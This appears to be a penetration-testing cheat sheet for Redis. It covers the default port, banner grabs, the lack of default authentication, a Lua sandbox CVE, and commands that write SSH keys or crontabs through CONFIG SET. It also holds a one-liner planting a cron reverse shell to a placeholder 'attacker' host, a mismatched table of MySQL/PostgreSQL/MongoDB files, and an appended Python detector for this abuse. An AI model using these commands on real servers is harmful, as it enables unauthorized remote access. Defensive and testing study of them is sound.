Redis
Redis, Remote Dictionary Server, Redis Cache
Redis is an in-memory data structure store. Unauthenticated access allows reading and writing keys, and RCE by overwriting crontab or SSH key files when Redis can write to those directories.
Ports
| Port | Protocol | Description |
|---|---|---|
| 6379 | tcp | Redis |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
| `nmap -sV -p <port> <target>` | Service banner and version info |
| `nc -nv <target> <port>` | Raw banner grab |
Key Files
| Path | Description |
|---|---|
| /etc/mysql/mysql.cnf | MySQL client configuration |
| /var/lib/mysql/mysql/user.MYD | MySQL user table data |
| postgresql.conf | PostgreSQL configuration file |
| pg_hba.conf | PostgreSQL client authentication rules |
| mongod.conf | MongoDB daemon configuration |
Default Credentials
| Username | Password | Context |
|---|---|---|
| — | (none) | No authentication by default |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
| CVE-2022-0543 | RCE | Redis Lua sandbox escape |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Write SSH Key | `echo -e "\n\n<pubkey>\n\n" \| redis-cli -h <target> -x config set dir /root/.ssh` | SSH key overwrite |
| Write Crontab | `redis-cli -h <target> config set dir /var/spool/cron` | Cron-based RCE |
Notes
No authentication is the default — always check before brute-forcing.
Writeable Redis to SSH key overwrite: requires Redis to run as root or as a user with a home directory.
`CONFIG SET dir /var/spool/cron/crontabs/ && CONFIG SET dbfilename root && set x "\n* * * * * bash -i >& /dev/tcp/attacker/443 0>&1\n" && save`
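
The detection side of the crontab/SSH-key write sequence in the notes above, as an added example that is not part of the original page: it scans Redis `MONITOR` output for `CONFIG SET dir` into the directories this page names, followed by `SAVE` or `BGSAVE`. The function names and sample lines are constructed for illustration, and it assumes the command stream was captured in `MONITOR` format.

```python
import re
import shlex

# Write targets named on this page for the CONFIG SET dir primitive.
SENSITIVE_DIRS = ("/root/.ssh", "/var/spool/cron")
# MONITOR format: <epoch> [<db> <client>] "cmd" "arg" ...
LINE_RE = re.compile(r'^(\d+\.\d+) \[(\d+) (\S+)\] (.+)$')

def parse_monitor_line(line):
    """Return (timestamp, client, args), or None for non-command lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        args = shlex.split(m.group(4))
    except ValueError:  # unbalanced quotes in a truncated line
        return None
    return float(m.group(1)), m.group(3), args

def find_file_write_abuse(lines):
    """Flag SAVE/BGSAVE issued while dir points at a sensitive directory."""
    # CONFIG SET is server-wide, so state is tracked globally, not per client.
    state = {"dir": None, "dbfilename": None, "set_by": None}
    findings = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed is None or not parsed[2]:
            continue
        _ts, client, args = parsed
        cmd = [a.lower() for a in args[:2]]
        if cmd == ["config", "set"]:
            # Redis 7 accepts several name/value pairs in one CONFIG SET.
            for name, value in zip(args[2::2], args[3::2]):
                if name.lower() in ("dir", "dbfilename"):
                    state[name.lower()] = value
                    state["set_by"] = client
        elif cmd[0] in ("save", "bgsave") and state["dir"]:
            if state["dir"].rstrip("/").startswith(SENSITIVE_DIRS):
                findings.append({"saved_by": client, **state})
    return findings

# Constructed sample capture (not real traffic); the value is a placeholder.
SAMPLE = [
    "OK",
    '1700000000.000001 [0 10.0.0.5:50122] "CONFIG" "SET" "dir" "/var/spool/cron/crontabs/"',
    '1700000000.000002 [0 10.0.0.5:50122] "CONFIG" "SET" "dbfilename" "root"',
    '1700000000.000003 [0 10.0.0.5:50122] "SET" "x" "constructed-value"',
    '1700000000.000004 [0 10.0.0.5:50122] "save"',
]

if __name__ == "__main__":
    for finding in find_file_write_abuse(SAMPLE):
        print("ALERT:", finding)
```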
Seen on
Shodan, Censys, FOFA, ZoomEye